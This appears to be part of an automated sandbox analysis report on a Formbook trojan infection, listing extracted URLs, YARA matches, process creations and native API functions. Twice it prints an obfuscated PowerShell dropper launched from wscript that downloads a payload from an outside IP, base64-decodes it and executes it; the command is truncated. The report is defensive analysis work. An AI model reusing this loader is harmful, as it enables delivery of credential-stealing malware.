        Source: wscript.exe, 00000000.00000002.1681356282.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1681356282.00000279AD05D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680693920.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679408383.00000279AD022000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652064776.00000279AD0A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679408383.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680693920.00000279AD05D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652129352.00000279AD0A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
        Source: wscript.exe, 00000000.00000002.1681356282.00000279AD05D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679408383.00000279AD022000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652064776.00000279AD0A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680693920.00000279AD05D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652129352.00000279AD0A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
        Source: wscript.exe, 00000000.00000002.1681356282.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680693920.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652064776.00000279AD0A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679408383.00000279AD0A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652129352.00000279AD0A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
        Source: powershell.exe, 00000004.00000002.2000284208.0000000005145000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000001.00000002.2117543638.0000024A813F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000001.00000002.2218474708.0000024A90076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2003727475.000000000605E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: wscript.exe, 00000000.00000003.1653177020.00000279AD0D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
        Source: wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652785972.00000279AF073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://repository.luxtrust.lu0
        Source: wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://repository.tsp.zetes.com0
        Source: wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.certicamara.com/marco-legal0Z
        Source: wscript.exe, 00000000.00000003.1653193135.00000279AEF2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1653129148.00000279AEF29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/AC/ACTAS/789230
        Source: wscript.exe, 00000000.00000003.1653193135.00000279AEF2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1653129148.00000279AEF29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
        Source: wscript.exe, 00000000.00000003.1662983945.00000279AEEB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1653129148.00000279AEF29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/address/)1(0&
        Source: wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
        Source: wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
        Source: wscript.exe, 00000000.00000003.1652785972.00000279AF073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.netlock.hu/docs/
        Source: wscript.exe, 00000000.00000003.1653057324.00000279AEF3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.netlock.net/docs
        Source: wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m

        E-Banking Fraud

        barindex
        Source: Yara matchFile source: 00000009.00000002.2260878496.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2945407561.0000000000860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2286239677.0000000023700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2945907117.0000000000DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2945047764.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2945916928.0000000002C00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Source: amsi64_7556.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: amsi32_7748.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: 00000009.00000002.2260878496.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000B.00000002.2945407561.0000000000860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000009.00000002.2286239677.0000000023700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000B.00000002.2945907117.0000000000DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000C.00000002.2945047764.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000A.00000002.2945916928.0000000002C00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: Process Memory Space: powershell.exe PID: 7556, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 7748, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Initial file: Call Analfabetismen.ShellExecute("P" & Boltres & ".e" + "xe", Flnsning, "", "", Trskafters)
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3276
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3276
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3276Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3276Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kildematerialet107 = 1;$Kernevaabnet='Substrin';$Kernevaabnet+='g';Function ciceroner($Bldgringer){$Cholecystogram=$Bldgringer.Length-$Kildematerialet107;For($Brandsituationerne=1; $Brandsituationerne -lt $Cholecystogram; $Brandsituationerne+=(2)){$Categoricalness+=$Bldgringer.$Kernevaabnet.Invoke($Brandsituationerne, $Kildematerialet107);}$Categoricalness;}function Nonsensitizeds($whap){& ($Skimpiness) ($whap);}$Autoindtrks=ciceroner 'PM,o z i l lOaK/,5K. 0 ( W.iAnRd oUw sC NETC ,1S0.. 0M;I W i nu6 4.;W PxS6R4 ;, rRvK: 1 2B1A. 0 )S cG.egcKk oA/ 2E0R1S0 0l1 0Y1T .FTiOr,e,f o.xP/n1s2U1G.,0B ';$Hypsilophodontoid21=ciceroner 'KU.s ePr - A g e,nPt ';$Lydsidernes=ciceroner 'Uh tOtMp,:./ /L8B7 . 1 2 1w..1 0.5R.g1 6U3 /.BFo,lPd,kClUuSbHbSeCn s,. p cKzN ';$jvnhjde=ciceroner ',>, ';$Skimpiness=ciceroner 'AiJeUx, ';$equichangeable='Jynginae';Nonsensitizeds (ciceroner '.S,eRt -BC oMn,tPe nPtM -ZPSa tNh WT :E\SFTeGi ..t xCtU G-,V all,u,eR $AeSq uIipc,hFa nPg eBa b l.e ;M ');Nonsensitizeds (ciceroner ',i.f. E(BtKeKs tE- p a t h TB: \AFAe i..stGxTt ),{ eUxIiMt }W; ');$Nutmegged = ciceroner 'QeBc.hSoU %taOp p dSast aT%,\AcbeJi,l.oamEe.t eIr s,.BPBrAiU H&,&. eDc,hDoB $. ';Nonsensitizeds (ciceroner ' $ gSlRo bTa l.:,C oTnNv eSt h.=K(.c mDdT a/ac $RN uFt.mMe g,gPeFdL)P ');Nonsensitizeds (ciceroner 'F$OgKl o b aAlS:TL itn i e sFk r.i vUeVrAsr=F$NLByDdSs i d,eTrInReSs,.Ns.p lLi t ( $Hj.v n hFjLd,e,). ');$Lydsidernes=$Linieskrivers[0];Nonsensitizeds (ciceroner 'T$Og lEo b aUlr: RAe fSe.r eLn c e.v rTkDe rw=PNCe w - O b j.ePcStU .ShyPsPt eNmD. N e.tG.JWEe bFC.lTi e,n t. ');Nonsensitizeds (ciceroner 'U$UR.eKfAe rDe,nsc e,v r.kIe rG.VH e aPd eDr,sO[R$MHRyVpFs iLlAo.pFhIo dGo,n tDo.iIdu2,1O].=.$UA uFt oUi n,d t r.k sL ');$Superrheumatized=ciceroner 'LR.eHfSeFr e,n cte.vBrVkOeVr .IDKo w nPl oNa d F i l.ec( $.LIy,d.sBiIdBeSrSn.e.sD, $.BAe,tTa g.eBtSh,e.dIsG), ';$Superrheumatized=$Conveth[1]+$Superrheumatized;$Betagetheds=$Conveth[0];Nonsensitizeds (ciceroner ' $AgFl o,bBa.l.:MDTvHnKl d.eEnC=I(UTFe s,tR- PMa.t.h $TBPe tSaMgMe tNhKe d s ) ');while (!$Dvnlden) {Nonsensitizeds (ciceroner '.$PgFlToSb aPlS: OSdTiKnSi aNn = $.t r u.eO ') ;Nonsensitizeds $Superrheumatized;Nonsensitizeds (ciceroner ' SWtBa.r.t -TS l.e e pS E4. ');Nonsensitizeds (ciceroner 'B$ g lEo.bCaWl,:,D vBnBlPdBeIn = (RTUe,s,tR- P.aSt ha B$,Bse t aAg e,tDh e.dDsP) ') ;Nonsensitizeds (ciceroner 'D$ gMlQo b,aCln: B.uVs t iDa n =F$RgSl.o bSaDlB:OO uOtSs m o k.e s +A+ % $,L iEn,iae sHkSriiBv eSrMsE.Kc.obuRn t ') ;$Lydsidernes=$Linieskrivers[$Bustian];}Nonsensitizeds (ciceroner 'G$ g l o bua l,: A mFpPhSo.lOyPt e,2,0m4 D=, SG e,t -,C o.n t eSn tS $ BBe.tdaEgEe t h eMd,s. ');Nonsensitizeds (ciceroner 'E$Fg lCoAbUa,lC:HSGtDa mSmAe,r,i nEgFlSyD F=. W[LS y,sWtKeBmT.TCCosn vSeSrAt.]R:G:CFqr oTm,BKa s eS6K4 SRt,r iVnUgS(,$ A,mBpPhJoAl.yItTe 2 0,4 )H ');Nonsensitizeds (c
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kildematerialet107 = 1;$Kernevaabnet='Substrin';$Kernevaabnet+='g';Function ciceroner($Bldgringer){$Cholecystogram=$Bldgringer.Length-$Kildematerialet107;For($Brandsituationerne=1; $Brandsituationerne -lt $Cholecystogram; $Brandsituationerne+=(2)){$Categoricalness+=$Bldgringer.$Kernevaabnet.Invoke($Brandsituationerne, $Kildematerialet107);}$Categoricalness;}function Nonsensitizeds($whap){& ($Skimpiness) ($whap);}$Autoindtrks=ciceroner 'PM,o z i l lOaK/,5K. 0 ( W.iAnRd oUw sC NETC ,1S0.. 0M;I W i nu6 4.;W PxS6R4 ;, rRvK: 1 2B1A. 0 )S cG.egcKk oA/ 2E0R1S0 0l1 0Y1T .FTiOr,e,f o.xP/n1s2U1G.,0B ';$Hypsilophodontoid21=ciceroner 'KU.s ePr - A g e,nPt ';$Lydsidernes=ciceroner 'Uh tOtMp,:./ /L8B7 . 1 2 1w..1 0.5R.g1 6U3 /.BFo,lPd,kClUuSbHbSeCn s,. p cKzN ';$jvnhjde=ciceroner ',>, ';$Skimpiness=ciceroner 'AiJeUx, ';$equichangeable='Jynginae';Nonsensitizeds (ciceroner '.S,eRt -BC oMn,tPe nPtM -ZPSa tNh WT :E\SFTeGi ..t xCtU G-,V all,u,eR $AeSq uIipc,hFa nPg eBa b l.e ;M ');Nonsensitizeds (ciceroner ',i.f. E(BtKeKs tE- p a t h TB: \AFAe i..stGxTt ),{ eUxIiMt }W; ');$Nutmegged = ciceroner 'QeBc.hSoU %taOp p dSast aT%,\AcbeJi,l.oamEe.t eIr s,.BPBrAiU H&,&. eDc,hDoB $. ';Nonsensitizeds (ciceroner ' $ gSlRo bTa l.:,C oTnNv eSt h.=K(.c mDdT a/ac $RN uFt.mMe g,gPeFdL)P ');Nonsensitizeds (ciceroner 'F$OgKl o b aAlS:TL itn i e sFk r.i vUeVrAsr=F$NLByDdSs i d,eTrInReSs,.Ns.p lLi t ( $Hj.v n hFjLd,e,). ');$Lydsidernes=$Linieskrivers[0];Nonsensitizeds (ciceroner 'T$Og lEo b aUlr: RAe fSe.r eLn c e.v rTkDe rw=PNCe w - O b j.ePcStU .ShyPsPt eNmD. N e.tG.JWEe bFC.lTi e,n t. ');Nonsensitizeds (ciceroner 'U$UR.eKfAe rDe,nsc e,v r.kIe rG.VH e aPd eDr,sO[R$MHRyVpFs iLlAo.pFhIo dGo,n tDo.iIdu2,1O].=.$UA uFt oUi n,d t r.k sL ');$Superrheumatized=ciceroner 'LR.eHfSeFr e,n cte.vBrVkOeVr .IDKo w nPl oNa d F i l.ec( $.LIy,d.sBiIdBeSrSn.e.sD, $.BAe,tTa g.eBtSh,e.dIsG), ';$Superrheumatized=$Conveth[1]+$Superrheumatized;$Betagetheds=$Conveth[0];Nonsensitizeds (ciceroner ' $AgFl o,bBa.l.:MDTvHnKl d.eEnC=I(UTFe s,tR- PMa.t.h $TBPe tSaMgMe tNhKe d s ) ');while (!$Dvnlden) {Nonsensitizeds (ciceroner '.$PgFlToSb aPlS: OSdTiKnSi aNn = $.t r u.eO ') ;Nonsensitizeds $Superrheumatized;Nonsensitizeds (ciceroner ' SWtBa.r.t -TS l.e e pS E4. ');Nonsensitizeds (ciceroner 'B$ g lEo.bCaWl,:,D vBnBlPdBeIn = (RTUe,s,tR- P.aSt ha B$,Bse t aAg e,tDh e.dDsP) ') ;Nonsensitizeds (ciceroner 'D$ gMlQo b,aCln: B.uVs t iDa n =F$RgSl.o bSaDlB:OO uOtSs m o k.e s +A+ % $,L iEn,iae sHkSriiBv eSrMsE.Kc.obuRn t ') ;$Lydsidernes=$Linieskrivers[$Bustian];}Nonsensitizeds (ciceroner 'G$ g l o bua l,: A mFpPhSo.lOyPt e,2,0m4 D=, SG e,t -,C o.n t eSn tS $ BBe.tdaEgEe t h eMd,s. ');Nonsensitizeds (ciceroner 'E$Fg lCoAbUa,lC:HSGtDa mSmAe,r,i nEgFlSyD F=. W[LS y,sWtKeBmT.TCCosn vSeSrAt.]R:G:CFqr oTm,BKa s eS6K4 SRt,r iVnUgS(,$ A,mBpPhJoAl.yItTe 2 0,4 )H ');Nonsensitizeds (cJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A235C0 NtCreateMutant,LdrInitializeThunk,9_2_22A235C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A22B60 NtClose,LdrInitializeThunk,9_2_22A22B60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A22C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_22A22C70
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A22DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_22A22DF0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04564650 NtSuspendThread,LdrInitializeThunk,11_2_04564650
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04564340 NtSetContextThread,LdrInitializeThunk,11_2_04564340
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_04562C70
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562C60 NtCreateKey,LdrInitializeThunk,11_2_04562C60
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_04562CA0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562D10 NtMapViewOfSection,LdrInitializeThunk,11_2_04562D10
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_04562D30
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562DD0 NtDelayExecution,LdrInitializeThunk,11_2_04562DD0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_04562DF0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562EE0 NtQueueApcThread,LdrInitializeThunk,11_2_04562EE0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562E80 NtReadVirtualMemory,LdrInitializeThunk,11_2_04562E80
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562F30 NtCreateSection,LdrInitializeThunk,11_2_04562F30
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562FE0 NtCreateFile,LdrInitializeThunk,11_2_04562FE0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562FB0 NtResumeThread,LdrInitializeThunk,11_2_04562FB0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562AD0 NtReadFile,LdrInitializeThunk,11_2_04562AD0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562AF0 NtWriteFile,LdrInitializeThunk,11_2_04562AF0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562B60 NtClose,LdrInitializeThunk,11_2_04562B60
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_04562BF0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562BE0 NtQueryValueKey,LdrInitializeThunk,11_2_04562BE0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562BA0 NtEnumerateValueKey,LdrInitializeThunk,11_2_04562BA0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045635C0 NtCreateMutant,LdrInitializeThunk,11_2_045635C0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04563090 NtSetValueKey,LdrInitializeThunk,11_2_04563090
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045639B0 NtGetContextThread,LdrInitializeThunk,11_2_045639B0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562C00 NtQueryInformationProcess,11_2_04562C00
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562CC0 NtQueryVirtualMemory,11_2_04562CC0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562CF0 NtOpenProcess,11_2_04562CF0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562D00 NtSetInformationFile,11_2_04562D00
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562DB0 NtEnumerateKey,11_2_04562DB0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562E30 NtWriteVirtualMemory,11_2_04562E30
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562EA0 NtAdjustPrivilegesToken,11_2_04562EA0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562F60 NtCreateProcessEx,11_2_04562F60
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562F90 NtProtectVirtualMemory,11_2_04562F90
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562FA0 NtQuerySection,11_2_04562FA0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562AB0 NtWaitForSingleObject,11_2_04562AB0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562B80 NtQueryInformationFile,11_2_04562B80
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04563010 NtOpenDirectoryObject,11_2_04563010
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04563D70 NtOpenThread,11_2_04563D70
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04563D10 NtOpenProcessToken,11_2_04563D10
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004E89A0 NtCreateFile,11_2_004E89A0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004E8AD0 NtReadFile,11_2_004E8AD0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004E8B90 NtDeleteFile,11_2_004E8B90
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004E8C10 NtClose,11_2_004E8C10
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004E8D50 NtAllocateVirtualMemory,11_2_004E8D50
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B87CAD61_2_00007FFD9B87CAD6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B87D8821_2_00007FFD9B87D882
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08AC18E04_2_08AC18E0
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08AC10104_2_08AC1010
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08AC0CC84_2_08AC0CC8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A912ED9_2_22A912ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A0D2F09_2_22A0D2F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A0B2C09_2_22A0B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A902749_2_22A90274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22AB03E69_2_22AB03E6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22AA132D9_2_22AA132D
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045E244611_2_045E2446
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045DE4F611_2_045DE4F6
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0453053511_2_04530535
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045F059111_2_045F0591
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454C6E011_2_0454C6E0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455475011_2_04554750
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0453077011_2_04530770
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0452C7C011_2_0452C7C0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045C200011_2_045C2000
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045B815811_2_045B8158
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045CA11811_2_045CA118
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0452010011_2_04520100
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045E81CC11_2_045E81CC
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045F01AA11_2_045F01AA
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045D027411_2_045D0274
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045B02C011_2_045B02C0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045EA35211_2_045EA352
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0453E3F011_2_0453E3F0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045F03E611_2_045F03E6
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04530C0011_2_04530C00
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04520CF211_2_04520CF2
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045D0CB511_2_045D0CB5
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0453AD0011_2_0453AD00
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0452ADE011_2_0452ADE0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04548DBF11_2_04548DBF
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04530E5911_2_04530E59
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045EEE2611_2_045EEE26
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045EEEDB11_2_045EEEDB
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04542E9011_2_04542E90
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045ECE9311_2_045ECE93
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A4F4011_2_045A4F40
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04550F3011_2_04550F30
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04572F2811_2_04572F28
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04522FC811_2_04522FC8
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045AEFA011_2_045AEFA0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0453A84011_2_0453A840
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0453284011_2_04532840
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455E8F011_2_0455E8F0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045168B811_2_045168B8
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454696211_2_04546962
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045329A011_2_045329A0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045FA9A611_2_045FA9A6
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0452EA8011_2_0452EA80
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045EAB4011_2_045EAB40
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045E6BD711_2_045E6BD7
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0452146011_2_04521460
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045EF43F11_2_045EF43F
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045E757111_2_045E7571
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045CD5B011_2_045CD5B0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045E16CC11_2_045E16CC
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045EF7B011_2_045EF7B0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045DF0CC11_2_045DF0CC
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045370C011_2_045370C0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045E70E911_2_045E70E9
